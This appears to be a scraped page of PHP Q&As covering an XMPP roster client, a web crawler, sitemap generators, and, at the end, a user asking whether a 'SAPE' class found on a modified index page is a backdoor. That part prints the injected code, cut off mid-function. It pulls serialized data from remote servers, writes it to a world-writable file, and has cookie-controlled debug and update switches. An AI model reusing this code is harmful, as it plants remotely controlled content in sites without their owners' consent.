And I can't use composer (the server is behind a firewall, and PHP-download.com does not work)
In particular, I need to export the user list with their groups
I have tried https://code.google.com/archive/p/xmpphp/ but it is not compatible with PHP 7
So you can't use composer on the server OK but why you don't use composer on your machine load the dependencies and upload the vendor folder. Then you have all you need.
Composer download all dependencies to the vendor folder and generate some autoloading files. When you upload the hole project it should work.
$server = "SERVER NAME HERE";
$username = "USER NAME HERE";
$password = "PASSWORD HERE";
$resource = "globe";
$streamid = "";
function vardump($data, $title = false){
if($title){
echo '<H2>' . $title . '</H2>';
}
echo '<PRE>';
var_dump($data);
echo '</PRE>';
}
function open_connection($server) {
$connection = fsockopen($server, 5222, $errno, $errstr);
if (!$connection) {
print "$errstr ($errno)<br>";
return false;
}
return $connection;
}
function send_xml($connection, $xml) {
fwrite($connection, $xml);
}
function textcontains($text, $searchfor, $or = false){
return stripos($text, $searchfor) !== false;
}
function send_recv_xml($connection, $xml, $size = 4096) {
send_xml($connection, $xml);
$data = recv_xml($connection, $size);
$data["sent_xml"] = $xml;
$data["sent_html"] = htmlspecialchars($xml);
return $data;
}
function fread_untildone($connection, $size = 4096){
$content = '';
if($size < 0){
while(!textcontains($content, '</iq>')){
$content .= fread($connection, abs($size));
}
} else {
$content = fread($connection, $size);
}
/*while(!feof($connection)){//did not work
$content .= fread($connection, $size);
}*/
return $content;
}
function recv_xml($connection, $size = 4096) {
$xml = fread_untildone($connection, $size);
if ($xml === "") {
return null;
}
// parses xml
$xml_parser = xml_parser_create();
xml_parse_into_struct($xml_parser, $xml, $val, $index);
xml_parser_free($xml_parser);
$RET = array($val, $index);
$RET["originaldata"] = $xml;
$RET["specialdata"] = htmlspecialchars($xml);
$RET["time"] = time();
return $RET;
}
function find_xmpp($connection, $tag, $value=null, &$ret=null) {
static $val = null, $index = null;
do {
if ($val === null && $index === null) {
list($val, $index) = recv_xml($connection);
if ($val === null || $index === null) {
return false;
}
}
foreach ($index as $tag_key => $tag_array) {
if ($tag_key === $tag) {
if ($value === null) {
if (isset($val[$tag_array[0]]['value'])) {
$ret = $val[$tag_array[0]]['value'];
}
return true;
}
foreach ($tag_array as $i => $pos) {
if ($val[$pos]['tag'] === $tag && isset($val[$pos]['value']) &&
$val[$pos]['value'] === $value) {
$ret = $val[$pos]['value'];
return true;
}
}
}
}
$val = $index = null;
} while (!feof($connection));
return false;
}
function xmpp_connect($server, $username, $password, $resource = "globe") {
global $streamid;
$connection = open_connection($server);
if (!$connection) {
return false;
}
send_xml($connection, '<stream:stream xmlns:stream="http://etherx.jabber.org/streams" version="1.0" xmlns="jabber:client" to="' . $server . '" xml:lang="en" xmlns:xml="http://www.w3.org/XML/1998/namespace">');
$data = recv_xml($connection);
$streamid = $data[0][0]["attributes"]["ID"];
//vardump($streamid, "stream id:");
send_xml($connection, '<iq type="get" to="' . $server . '" id="auth1"><query xmlns="jabber:iq:auth"><username>' . $username . '</username></query></iq>');
$data = recv_xml($connection);
$XML = '<iq type="set" id="auth2"><query xmlns="jabber:iq:auth">';
$fields = [];
foreach($data[1] as $KEY => $VALUE){
$KEY = strtolower($KEY);
switch($KEY){
case "username": $VALUE = $username; break;
case "password": $VALUE = $password; break;
case "digest": $VALUE = strtolower(sha1($streamid . $password)); break;
case "resource": $VALUE = $resource; break;
default: $VALUE = "";
}
$fields[ $KEY ] = $VALUE;
if($VALUE){
$XML .= '<' . $KEY . '>' . $VALUE . '</' . $KEY . '>';
}
}
$XML .= '</query></iq>';
//vardump($fields, "auth");
$data = send_recv_xml($connection, $XML);
//vardump($data, 'login');
return $connection;
}
function xmpp_enum_users($connection, $server, $username, $resource = "globe"){
//$XML = '<iq from="' . $username . '#' . $server . '/' . $resource . '" id="get-registered-users-list-1" to="' . $server . '" type="set" xml:lang="en">';
//$XML .= '<command xmlns="http://jabber.org/protocol/commands" action="execute" node="http://jabber.org/protocol/admin#get-registered-users-list"/></iq>';
/*$XML = '<iq from="' . $username . '" type="result" to="' . $username . '#' . $server . '/' . $resource . '" id="123">
<query xmlns="http://jabber.org/protocol/disco#items">
<item jid="conference.localhost" />
<item jid="pubsub.localhost" />
<item jid="riot.localhost" />
<item jid="vjud.localhost" />
<item node="announce" name="Announcements" jid="localhost" />
<item node="config" name="Configuration" jid="localhost" />
<item node="user" name="User Management" jid="localhost" />
<item node="online users" name="Online Users" jid="localhost" />
<item node="all users" name="All Users" jid="localhost" />
<item node="outgoing s2s" name="Outgoing s2s Connections" jid="localhost" />
<item node="running nodes" name="Running Nodes" jid="localhost" />
<item node="stopped nodes" name="Stopped Nodes" jid="localhost" />
</query></iq>';*/
global $streamid;
$XML = '<iq from="' . $username . '#' . $server . '/' . $resource . '" id="' . $streamid . '" type="get"><query xmlns="jabber:iq:roster"/></iq>';
return send_recv_xml($connection, $XML, -4096);
}
function xmpp_disconnect($connection){
fclose($connection);
}
$connection = xmpp_connect($server, $username, $password, $resource);
$data = xmpp_enum_users($connection, $server, $username, $resource);
$xml = simplexml_load_string($data["originaldata"]);
$users = [];
foreach($xml->query->item as $user){
$username = $user->attributes()->name;
$group = $user->group[0];
$users[$username] = $group;
}
vardump($users, "users");
echo '<HR>' . json_encode($users);
echo '<HR>';
foreach($users as $username => $group){
echo $username . '=' . $group . '<BR>';
}
xmpp_disconnect($connection);
This is the start of an XMPP client. It took a while to find the base code to connect, and I noticed other people asking for this but not getting it.
Related
So I have a web crawler that I am working on. And I have a CSV file that have about one million websites that I want to pass to be crawled. My problem is that I am able to save the CSV file in an array but when I pass it to the method that crawls it; it seems that it takes the first element and crawls it not the whole array. Can someone help me?
<?php
include("classes/DomDocumentParser.php");
include("config.php");
$alreadyCrawled = array();
$crawling = array();
$alreadyFoundImages = array();
$my_list = array();
function linkExists($url){
global $con;
$query = $con->prepare("SELECT * FROM sites WHERE url = :url");
$query ->bindParam(":url",$url);
$query->execute();
return $query->rowCount() != 0;
}
function insertImage($url,$src,$title,$alt){
global $con;
$query = $con->prepare("INSERT INTO images(siteUrl, imageUrl, alt, title)
VALUES(:siteUrl,:imageUrl,:alt,:title)");
$query ->bindParam(":siteUrl",$url);
$query ->bindParam(":imageUrl",$src);
$query ->bindParam(":alt",$alt);
$query ->bindParam(":title",$title);
return $query->execute();
}
function insertLink($url,$title,$description,$keywords){
global $con;
$query = $con->prepare("INSERT INTO sites(Url, title, description, keywords)
VALUES(:url,:title,:description,:keywords)");
$query ->bindParam(":url",$url);
$query ->bindParam(":title",$title);
$query ->bindParam(":description",$description);
$query ->bindParam(":keywords",$keywords);
return $query->execute();
}
function createLink($src,$url){
$scheme = parse_url($url)["scheme"]; // http or https
$host = parse_url($url)["host"]; // www.mohamad-ahmad.com
if(substr($src,0,2) =="//"){
// //www.mohanadahmad.com
$src = $scheme . ":" . $src;
}
else if(substr($src,0,1) =="/"){
// /aboutus/about.php
$src = $scheme . "://" . $host . $src;
}
else if(substr($src,0,2) =="./"){
// ./aboutus/about.php
$src = $scheme . "://" . $host . dirname(parse_url($url)["path"]) . substr($src ,1);
}
else if(substr($src,0,3) =="../"){
// ../aboutus/about.php
$src = $scheme . "://" . $host . "/" . $src;
}
else if(substr($src,0,5) !="https" && substr($src,0,4) !="http" ){
// aboutus/about.php
$src = $scheme . "://" . $host ."/" .$src;
}
return $src;
}
function getDetails($url){
global $alreadyFoundImages;
$parser = new DomDocumentParser($url);
$titleArray = $parser->getTitletags();
if(sizeof($titleArray) == 0 || $titleArray->item(0) == NULL){
return;
}
$title = $titleArray -> item(0) -> nodeValue;
$title = str_replace("\n","",$title);
if($title == ""){
return;
}
$description="";
$keywords="";
$metasArray = $parser -> getMetatags();
foreach($metasArray as $meta){
if($meta->getAttribute("name") == "description"){
$description = $meta -> getAttribute("content");
}
if($meta->getAttribute("name") == "keywords"){
$keywords = $meta -> getAttribute("content");
}
}
$description = str_replace("\n","",$description);
$keywords = str_replace("\n","",$keywords);
if(linkExists($url)){
echo "$url already exists <br>";
}
else if(insertLink($url,$title,$description,$keywords)){
echo "SUCCESS: $url <br>";
}
else{
echo "ERROR: Failed to insert $url <br>";
}
$imageArray = $parser ->getImages();
foreach($imageArray as $image){
$src = $image->getAttribute("src");
$alt = $image->getAttribute("alt");
$title = $image->getAttribute("title");
if(!$title && !$alt){
continue;
}
$src = createLink($src,$url);
if(!in_array($src,$alreadyFoundImages)){
$alreadyFoundImages[] = $src;
insertImage($url,$src,$alt,$title);
}
}
}
function followLinks($url) {
global $crawling;
global $alreadyCrawled;
$parser = new DomDocumentParser($url);
$linkList = $parser->getLinks();
foreach($linkList as $link){
$href = $link->getAttribute("href");
if(strpos($href,"#") !==false){
// Ignore anchor url
continue;
}
else if(substr($href,0,11)== "javascript:"){
// Ignore javascript url
continue;
}
$href = createLink($href,$url);
if(!in_array($href,$alreadyCrawled)){
$alreadyCrawled[] = $href;
$crawling[] = $href;
//getDetails contain the insert into db
getDetails($href);
}
}
array_shift($crawling);
foreach($crawling as $site){
followLinks($site);
}
}
function fill_my_list(){
global $my_list;
$file = fopen('top-1m.csv', 'r');
while( ($data = fgetcsv($file)) !== false ) {
$startUrl = "https://www.".$data[1];
$my_list[] = $startUrl;
}
foreach($my_list as $key => $u){
followLinks($u);
}
}
fill_my_list();
?>
You can do something like this by php.net
$row = 1;
if (($File = fopen("test.csv", "r")) !== FALSE) {
while (($data = fgetcsv($File, 1000, ",")) !== FALSE) {
$num = count($data);
echo "<p> $num fields in line $row: <br /></p>\n";
$row++;
for ($c=0; $c < $num; $c++) {
echo $data[$c] . "<br />\n";
}
//Use $data[$c];
}
fclose($File);
}
Here more examples : https://www.php.net/manual/en/function.fgetcsv.php#refsect1-function.fgetcsv-examples
I use a script from here to generate my sitemaps.
I can call it with the browser with http://www.example.com/sitemap.php?update=pages and its working fine.
I need to call it as shell script so that I can automate it with the windows task scheduler. But the script needs to be changed to get the variables ?update=pages. But I don't manage to change it correctly.
Could anybody help me so that I can execute the script from command line with
...\php C:\path\to\script\sitemap.php update=pages. It would also be fine for me to hardcode the variables into the script since I wont change them anyway.
define("BASE_URL", "http://www.example.com/");
define ('BASE_URI', $_SERVER['DOCUMENT_ROOT'] . '/');
class Sitemap {
private $compress;
private $page = 'index';
private $index = 1;
private $count = 1;
private $urls = array();
public function __construct ($compress=true) {
ini_set('memory_limit', '75M'); // 50M required per tests
$this->compress = ($compress) ? '.gz' : '';
}
public function page ($name) {
$this->save();
$this->page = $name;
$this->index = 1;
}
public function url ($url, $lastmod='', $changefreq='', $priority='') {
$url = htmlspecialchars(BASE_URL . 'xx' . $url);
$lastmod = (!empty($lastmod)) ? date('Y-m-d', strtotime($lastmod)) : false;
$changefreq = (!empty($changefreq) && in_array(strtolower($changefreq), array('always', 'hourly', 'daily', 'weekly', 'monthly', 'yearly', 'never'))) ? strtolower($changefreq) : false;
$priority = (!empty($priority) && is_numeric($priority) && abs($priority) <= 1) ? round(abs($priority), 1) : false;
if (!$lastmod && !$changefreq && !$priority) {
$this->urls[] = $url;
} else {
$url = array('loc'=>$url);
if ($lastmod !== false) $url['lastmod'] = $lastmod;
if ($changefreq !== false) $url['changefreq'] = $changefreq;
if ($priority !== false) $url['priority'] = ($priority < 1) ? $priority : '1.0';
$this->urls[] = $url;
}
if ($this->count == 50000) {
$this->save();
} else {
$this->count++;
}
}
public function close() {
$this->save();
}
private function save () {
if (empty($this->urls)) return;
$file = "sitemaps/xx-sitemap-{$this->page}-{$this->index}.xml{$this->compress}";
$xml = '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
$xml .= '<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">' . "\n";
foreach ($this->urls as $url) {
$xml .= ' <url>' . "\n";
if (is_array($url)) {
foreach ($url as $key => $value) $xml .= " <{$key}>{$value}</{$key}>\n";
} else {
$xml .= " <loc>{$url}</loc>\n";
}
$xml .= ' </url>' . "\n";
}
$xml .= '</urlset>' . "\n";
$this->urls = array();
if (!empty($this->compress)) $xml = gzencode($xml, 9);
$fp = fopen(BASE_URI . $file, 'wb');
fwrite($fp, $xml);
fclose($fp);
$this->index++;
$this->count = 1;
$num = $this->index; // should have already been incremented
while (file_exists(BASE_URI . "xxb-sitemap-{$this->page}-{$num}.xml{$this->compress}")) {
unlink(BASE_URI . "xxc-sitemap-{$this->page}-{$num}.xml{$this->compress}");
$num++;
}
$this->index($file);
}
private function index ($file) {
$sitemaps = array();
$index = "sitemaps/xx-sitemap-index.xml{$this->compress}";
if (file_exists(BASE_URI . $index)) {
$xml = (!empty($this->compress)) ? gzfile(BASE_URI . $index) : file(BASE_URI . $index);
$tags = $this->xml_tag(implode('', $xml), array('sitemap'));
foreach ($tags as $xml) {
$loc = str_replace(BASE_URL, '', $this->xml_tag($xml, 'loc'));
$lastmod = $this->xml_tag($xml, 'lastmod');
$lastmod = ($lastmod) ? date('Y-m-d', strtotime($lastmod)) : date('Y-m-d');
if (file_exists(BASE_URI . $loc)) $sitemaps[$loc] = $lastmod;
}
}
$sitemaps[$file] = date('Y-m-d');
$xml = '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
$xml .= '<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">' . "\n";
foreach ($sitemaps as $loc => $lastmod) {
$xml .= ' <sitemap>' . "\n";
$xml .= ' <loc>' . BASE_URL . $loc . '</loc>' . "\n";
$xml .= ' <lastmod>' . $lastmod . '</lastmod>' . "\n";
$xml .= ' </sitemap>' . "\n";
}
$xml .= '</sitemapindex>' . "\n";
if (!empty($this->compress)) $xml = gzencode($xml, 9);
$fp = fopen(BASE_URI . $index, 'wb');
fwrite($fp, $xml);
fclose($fp);
}
private function xml_tag ($xml, $tag, &$end='') {
if (is_array($tag)) {
$tags = array();
while ($value = $this->xml_tag($xml, $tag[0], $end)) {
$tags[] = $value;
$xml = substr($xml, $end);
}
return $tags;
}
$pos = strpos($xml, "<{$tag}>");
if ($pos === false) return false;
$start = strpos($xml, '>', $pos) + 1;
$length = strpos($xml, "</{$tag}>", $start) - $start;
$end = strpos($xml, '>', $start + $length) + 1;
return ($end !== false) ? substr($xml, $start, $length) : false;
}
public function __destruct () {
$this->save();
}
}
// start part 2
$sitemap = new Sitemap;
if (get('pages')) {
$sitemap->page('pages');
$result = mysql_query("SELECT uri FROM app_uri");
while (list($url, $created) = mysql_fetch_row($result)) {
$sitemap->url($url, $created, 'monthly');
}
}
$sitemap->close();
unset ($sitemap);
function get ($name) {
return (isset($_GET['update']) && strpos($_GET['update'], $name) !== false) ? true : false;
}
?>
I could install wget (it's available for windows as well) and then call the url via localhost in the task scheduler script:
wget.exe "http://localhost/path/to/script.php?pages=test"
This way you wouldn't have to rewrite the php script.
Otherwise, if the script is meant for shell usage only, then pass variables via command line:
php yourscript.php variable1 variable2 ...
In the php script you can than access those variables using the $argv variable:
$variable1 = $argv[1];
$variable2 = $argv[2];
have a look on:
How to pass GET variables to php file with Shell?
which already answered the same question :).
I want to create a sitemap for a page with more than 30.000.000 pages. The page is daily updating, removing and adding new pages.
I found this php script which I would like to run with a cron job.
Sitemap php script
I have all URIs in the table "myuri" in the column "uri" entries are written e.g. "/this-is-a-page.html". What parameters do I need to add to the script to get it running on my table?
<?php
/*
* author: Kyle Gadd
* documentation: http://www.php-ease.com/classes/sitemap.html
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
class Sitemap {
private $compress;
private $page = 'index';
private $index = 1;
private $count = 1;
private $urls = array();
public function __construct ($compress=true) {
ini_set('memory_limit', '75M'); // 50M required per tests
$this->compress = ($compress) ? '.gz' : '';
}
public function page ($name) {
$this->save();
$this->page = $name;
$this->index = 1;
}
public function url ($url, $lastmod='', $changefreq='', $priority='') {
$url = htmlspecialchars(BASE_URL . $url);
$lastmod = (!empty($lastmod)) ? date('Y-m-d', strtotime($lastmod)) : false;
$changefreq = (!empty($changefreq) && in_array(strtolower($changefreq), array('always', 'hourly', 'daily', 'weekly', 'monthly', 'yearly', 'never'))) ? strtolower($changefreq) : false;
$priority = (!empty($priority) && is_numeric($priority) && abs($priority) <= 1) ? round(abs($priority), 1) : false;
if (!$lastmod && !$changefreq && !$priority) {
$this->urls[] = $url;
} else {
$url = array('loc'=>$url);
if ($lastmod !== false) $url['lastmod'] = $lastmod;
if ($changefreq !== false) $url['changefreq'] = $changefreq;
if ($priority !== false) $url['priority'] = ($priority < 1) ? $priority : '1.0';
$this->urls[] = $url;
}
if ($this->count == 50000) {
$this->save();
} else {
$this->count++;
}
}
public function close() {
$this->save();
$this->ping_search_engines();
}
private function save () {
if (empty($this->urls)) return;
$file = "sitemap-{$this->page}-{$this->index}.xml{$this->compress}";
$xml = '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
$xml .= '<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">' . "\n";
foreach ($this->urls as $url) {
$xml .= ' <url>' . "\n";
if (is_array($url)) {
foreach ($url as $key => $value) $xml .= " <{$key}>{$value}</{$key}>\n";
} else {
$xml .= " <loc>{$url}</loc>\n";
}
$xml .= ' </url>' . "\n";
}
$xml .= '</urlset>' . "\n";
$this->urls = array();
if (!empty($this->compress)) $xml = gzencode($xml, 9);
$fp = fopen(BASE_URI . $file, 'wb');
fwrite($fp, $xml);
fclose($fp);
$this->index++;
$this->count = 1;
$num = $this->index; // should have already been incremented
while (file_exists(BASE_URI . "sitemap-{$this->page}-{$num}.xml{$this->compress}")) {
unlink(BASE_URI . "sitemap-{$this->page}-{$num}.xml{$this->compress}");
$num++;
}
$this->index($file);
}
private function index ($file) {
$sitemaps = array();
$index = "sitemap-index.xml{$this->compress}";
if (file_exists(BASE_URI . $index)) {
$xml = (!empty($this->compress)) ? gzfile(BASE_URI . $index) : file(BASE_URI . $index);
$tags = $this->xml_tag(implode('', $xml), array('sitemap'));
foreach ($tags as $xml) {
$loc = str_replace(BASE_URL, '', $this->xml_tag($xml, 'loc'));
$lastmod = $this->xml_tag($xml, 'lastmod');
$lastmod = ($lastmod) ? date('Y-m-d', strtotime($lastmod)) : date('Y-m-d');
if (file_exists(BASE_URI . $loc)) $sitemaps[$loc] = $lastmod;
}
}
$sitemaps[$file] = date('Y-m-d');
$xml = '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
$xml .= '<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">' . "\n";
foreach ($sitemaps as $loc => $lastmod) {
$xml .= ' <sitemap>' . "\n";
$xml .= ' <loc>' . BASE_URL . $loc . '</loc>' . "\n";
$xml .= ' <lastmod>' . $lastmod . '</lastmod>' . "\n";
$xml .= ' </sitemap>' . "\n";
}
$xml .= '</sitemapindex>' . "\n";
if (!empty($this->compress)) $xml = gzencode($xml, 9);
$fp = fopen(BASE_URI . $index, 'wb');
fwrite($fp, $xml);
fclose($fp);
}
private function xml_tag ($xml, $tag, &$end='') {
if (is_array($tag)) {
$tags = array();
while ($value = $this->xml_tag($xml, $tag[0], $end)) {
$tags[] = $value;
$xml = substr($xml, $end);
}
return $tags;
}
$pos = strpos($xml, "<{$tag}>");
if ($pos === false) return false;
$start = strpos($xml, '>', $pos) + 1;
$length = strpos($xml, "</{$tag}>", $start) - $start;
$end = strpos($xml, '>', $start + $length) + 1;
return ($end !== false) ? substr($xml, $start, $length) : false;
}
public function ping_search_engines () {
$sitemap = BASE_URL . 'sitemap-index.xml' . $this->compress;
$engines = array();
$engines['www.google.com'] = '/webmasters/tools/ping?sitemap=' . urlencode($sitemap);
$engines['www.bing.com'] = '/webmaster/ping.aspx?siteMap=' . urlencode($sitemap);
$engines['submissions.ask.com'] = '/ping?sitemap=' . urlencode($sitemap);
foreach ($engines as $host => $path) {
if ($fp = fsockopen($host, 80)) {
$send = "HEAD $path HTTP/1.1\r\n";
$send .= "HOST: $host\r\n";
$send .= "CONNECTION: Close\r\n\r\n";
fwrite($fp, $send);
$http_response = fgets($fp, 128);
fclose($fp);
list($response, $code) = explode (' ', $http_response);
if ($code != 200) trigger_error ("{$host} ping was unsuccessful.<br />Code: {$code}<br />Response: {$response}");
}
}
}
public function __destruct () {
$this->save();
}
}
?>
There is already an example of usage on the page:
<?php
require_once ('php/classes/Sitemap.php');
$sitemap = new Sitemap;
if (get('pages')) {
$sitemap->page('pages');
$result = db_query ("SELECT url, created FROM pages"); // 20 pages
while (list($url, $created) = $result->fetch_row()) {
$sitemap->url($url, $created, 'yearly');
}
}
if (get('posts')) {
$sitemap->page('posts');
$result = db_query ("SELECT url, updated FROM posts"); // 70,000 posts
while (list($url, $updated) = $result->fetch_row()) {
$sitemap->url($url, $updated, 'monthly');
}
}
$sitemap->close();
unset ($sitemap);
function get ($name) {
return (isset($_GET['update']) && strpos($_GET['update'], $name) !== false) ? true : false;
}
?>
I would change this part....
if (get('pages')) {
$sitemap->page('pages');
$result = db_query ("SELECT uri FROM myuri");
while (list($url) = mysql_fetch_row($result)) {
$sitemap->url($url,'', 'yearly');
}
}
Not sure if that $updated is needed? Looks like the function just defaults it to an empty string anyways...... But maybe you could at a timestamp column to your table to pull the last updated date as well, and feed it into the function where I put ''.
Also....remove this part...
if (get('posts')) {
$sitemap->page('posts');
$result = db_query ("SELECT url, updated FROM posts"); // 70,000 posts
while (list($url, $updated) = $result->fetch_row()) {
$sitemap->url($url, $updated, 'monthly');
}
}
Closed. This question is off-topic. It is not currently accepting answers.
Want to improve this question? Update the question so it's on-topic for Stack Overflow.
Closed 10 years ago.
Improve this question
I found this script attached to a modified index page. This looks like some kind of backdoor. and who is this SAPE ?
<?php
class SAPE_base {
var $_version = '1.0.8';
var $_verbose = false;
var $_charset = '';
var $_sape_charset = '';
var $_server_list = array('dispenser-01.sape.ru', 'dispenser-02.sape.ru');
var $_cache_lifetime = 3600;
var $_cache_reloadtime = 600;
var $_error = '';
var $_host = '';
var $_request_uri = '';
var $_multi_site = false;
var $_fetch_remote_type = '';
var $_socket_timeout = 6;
var $_force_show_code = false;
var $_is_our_bot = false;
var $_debug = false;
var $_ignore_case = false;
var $_db_file = '';
var $_use_server_array = false;
var $_force_update_db = false;
function SAPE_base($options = null) {
$host = '';
if (is_array($options)) {
if (isset($options['host'])) {
$host = $options['host'];
}
}
elseif (strlen($options)) {
$host = $options;
$options = array();
}
else {
$options = array();
}
if (isset($options['use_server_array']) && $options['use_server_array'] == true) {
$this->_use_server_array = true;
}
if (strlen($host)) {
$this->_host = $host;
}
else {
$this->_host = $_SERVER['HTTP_HOST'];
}
$this->_host = preg_replace('/^http:\/\//', '', $this->_host);
$this->_host = preg_replace('/^www\./', '', $this->_host);
if (isset($options['request_uri']) && strlen($options['request_uri'])) {
$this->_request_uri = $options['request_uri'];
}
elseif ($this->_use_server_array === false) {
$this->_request_uri = getenv('REQUEST_URI');
}
if (strlen($this->_request_uri) == 0) {
$this->_request_uri = $_SERVER['REQUEST_URI'];
}
if (isset($options['multi_site']) && $options['multi_site'] == true) {
$this->_multi_site = true;
}
if (isset($options['debug']) && $options['debug'] == true) {
$this->_debug = true;
}
if (isset($_COOKIE['sape_cookie']) && ($_COOKIE['sape_cookie'] == _SAPE_USER)) {
$this->_is_our_bot = true;
if (isset($_COOKIE['sape_debug']) && ($_COOKIE['sape_debug'] == 1)) {
$this->_debug = true;
$this->_options = $options;
$this->_server_request_uri = $this->_request_uri = $_SERVER['REQUEST_URI'];
$this->_getenv_request_uri = getenv('REQUEST_URI');
$this->_SAPE_USER = _SAPE_USER;
}
if (isset($_COOKIE['sape_updatedb']) && ($_COOKIE['sape_updatedb'] == 1)) {
$this->_force_update_db = true;
}
}
else {
$this->_is_our_bot = false;
}
if (isset($options['verbose']) && $options['verbose'] == true || $this->_debug) {
$this->_verbose = true;
}
if (isset($options['charset']) && strlen($options['charset'])) {
$this->_charset = $options['charset'];
}
else {
$this->_charset = 'windows-1251';
}
if (isset($options['fetch_remote_type']) && strlen($options['fetch_remote_type'])) {
$this->_fetch_remote_type = $options['fetch_remote_type'];
}
if (isset($options['socket_timeout']) && is_numeric($options['socket_timeout']) && $options['socket_timeout'] > 0) {
$this->_socket_timeout = $options['socket_timeout'];
}
if (isset($options['force_show_code']) && $options['force_show_code'] == true) {
$this->_force_show_code = true;
}
if (!defined('_SAPE_USER')) {
return $this->raise_error('Не задана константа _SAPE_USER');
}
if (isset($options['ignore_case']) && $options['ignore_case'] == true) {
$this->_ignore_case = true;
$this->_request_uri = strtolower($this->_request_uri);
}
}
function fetch_remote_file($host, $path) {
$user_agent = $this->_user_agent . ' ' . $this->_version;
#ini_set('allow_url_fopen', 1);
#ini_set('default_socket_timeout', $this->_socket_timeout);
#ini_set('user_agent', $user_agent);
if (
$this->_fetch_remote_type == 'file_get_contents'
||
(
$this->_fetch_remote_type == ''
&&
function_exists('file_get_contents')
&&
ini_get('allow_url_fopen') == 1
)
) {
$this->_fetch_remote_type = 'file_get_contents';
if ($data = #file_get_contents('http://' . $host . $path)) {
return $data;
}
}
elseif (
$this->_fetch_remote_type == 'curl'
||
(
$this->_fetch_remote_type == ''
&&
function_exists('curl_init')
)
) {
$this->_fetch_remote_type = 'curl';
if ($ch = #curl_init()) {
#curl_setopt($ch, CURLOPT_URL, 'http://' . $host . $path);
#curl_setopt($ch, CURLOPT_HEADER, false);
#curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
#curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $this->_socket_timeout);
#curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
if ($data = #curl_exec($ch)) {
return $data;
}
#curl_close($ch);
}
}
else {
$this->_fetch_remote_type = 'socket';
$buff = '';
$fp = #fsockopen($host, 80, $errno, $errstr, $this->_socket_timeout);
if ($fp) {
#fputs($fp, "GET {$path} HTTP/1.0\r\nHost: {$host}\r\n");
#fputs($fp, "User-Agent: {$user_agent}\r\n\r\n");
while (!#feof($fp)) {
$buff .= #fgets($fp, 128);
}
#fclose($fp);
$page = explode("\r\n\r\n", $buff);
return $page[1];
}
}
return $this->raise_error('Не могу подключиться к серверу: ' . $host . $path . ', type: ' . $this->_fetch_remote_type);
}
function _read($filename) {
$fp = #fopen($filename, 'rb');
#flock($fp, LOCK_SH);
if ($fp) {
clearstatcache();
$length = #filesize($filename);
$mqr = #get_magic_quotes_runtime();
#set_magic_quotes_runtime(0);
if ($length) {
$data = #fread($fp, $length);
}
else {
$data = '';
}
#set_magic_quotes_runtime($mqr);
#flock($fp, LOCK_UN);
#fclose($fp);
return $data;
}
return $this->raise_error('Не могу считать данные из файла: ' . $filename);
}
function _write($filename, $data) {
$fp = #fopen($filename, 'ab');
if ($fp) {
if (flock($fp, LOCK_EX | LOCK_NB)) {
$length = strlen($data);
ftruncate($fp, 0);
#fwrite($fp, $data, $length);
#flock($fp, LOCK_UN);
#fclose($fp);
if (md5($this->_read($filename)) != md5($data)) {
#unlink($filename);
return $this->raise_error('Нарушена целостность данных при записи в файл: ' . $filename);
}
}
else {
return false;
}
return true;
}
return $this->raise_error('Не могу записать данные в файл: ' . $filename);
}
function raise_error($e) {
$this->_error = '<p style="color: red; font-weight: bold;">SAPE ERROR: ' . $e . '</p>';
if ($this->_verbose == true) {
print $this->_error;
}
return false;
}
function load_data() {
$this->_db_file = $this->_get_db_file();
if (!is_file($this->_db_file)) {
if (#touch($this->_db_file)) {
#chmod($this->_db_file, 0666);
}
else {
return $this->raise_error('Нет файла ' . $this->_db_file . '. Создать не удалось. Выставите права 777 на папку.');
}
}
if (!is_writable($this->_db_file)) {
return $this->raise_error('Нет доступа на запись к файлу: ' . $this->_db_file . '! Выставите права 777 на папку.');
}
#clearstatcache();
$data = $this->_read($this->_db_file);
if (
$this->_force_update_db
|| (
!$this->_is_our_bot
&&
(
filemtime($this->_db_file) < (time() - $this->_cache_lifetime)
||
filesize($this->_db_file) == 0
||
#unserialize($data) == false
)
)
) {
#touch($this->_db_file, (time() - $this->_cache_lifetime + $this->_cache_reloadtime));
$path = $this->_get_dispenser_path();
if (strlen($this->_charset)) {
$path .= '&charset=' . $this->_charset;
}
foreach ($this->_server_list as $i => $server) {
if ($data = $this->fetch_remote_file($server, $path)) {
if (substr($data, 0, 12) == 'FATAL ERROR:') {
$this->raise_error($data);
}
else {
$hash = #unserialize($data);
if ($hash != false) {
$hash['__sape_charset__'] = $this->_charset;
$hash['__last_update__'] = time();
$hash['__multi_site__'] = $this->_multi_site;
$hash['__fetch_remote_type__'] = $this->_fetch_remote_type;
$hash['__ignore_case__'] = $this->_ignore_case;
$hash['__php_version__'] = phpversion();
$hash['__server_software__'] = $_SERVER['SERVER_SOFTWARE'];
$data_new = #serialize($hash);
if ($data_new) {
$data = $data_new;
}
$this->_write($this->_db_file, $data);
break;
}
}
}
}
}
if (strlen(session_id())) {
$session = session_name() . '=' . session_id();
$this->_request_uri = str_replace(array('?' . $session, '&' . $session), '', $this->_request_uri);
}
$this->set_data(#unserialize($data));
}
}
class SAPE_client extends SAPE_base {
var $_links_delimiter = '';
var $_links = array();
var $_links_page = array();
var $_user_agent = 'SAPE_Client PHP';
function SAPE_client($options = null) {
parent::SAPE_base($options);
$this->load_data();
}
function return_links($n = null, $offset = 0) {
if (is_array($this->_links_page)) {
$total_page_links = count($this->_links_page);
if (!is_numeric($n) || $n > $total_page_links) {
$n = $total_page_links;
}
$links = array();
for ($i = 1; $i <= $n; $i++) {
if ($offset > 0 && $i <= $offset) {
array_shift($this->_links_page);
}
else {
$links[] = array_shift($this->_links_page);
}
}
$html = join($this->_links_delimiter, $links);
